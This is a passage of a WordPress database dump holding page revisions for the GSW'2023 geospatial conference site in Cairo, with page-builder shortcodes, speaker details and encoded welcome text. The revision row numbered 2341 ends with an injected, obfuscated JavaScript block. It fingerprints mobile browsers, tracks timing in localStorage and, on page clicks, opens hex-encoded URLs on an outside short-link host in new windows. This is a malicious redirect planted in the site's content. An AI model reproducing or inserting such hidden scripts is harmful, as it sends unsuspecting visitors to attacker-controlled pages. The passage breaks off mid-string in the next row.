21:18:15','',2167,'https://gsw2023.com/?p=2340',0,'revision','',0),
(2341,1,'2022-10-06 21:19:15','2022-10-06 21:19:15','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665123014762{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #3098E3), color-stop(54%, #6FA1D4), color-stop(81%, #488CBD), color-stop(95%, #3298CF));background: -moz-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -webkit-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -o-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -ms-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 By\" main_heading_color=\"#ecf404\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_single_image image=\"2325\" alignment=\"center\" css_animation=\"fadeIn\" title=\"AASTMT\"][vc_single_image image=\"2326\" alignment=\"center\" title=\"ISPRS\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-06 21:19:15','2022-10-06 21:19:15','',2167,'https://gsw2023.com/?p=2341',0,'revision','',0),
(2342,1,'2022-10-06 21:45:35','2022-10-06 21:45:35','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHd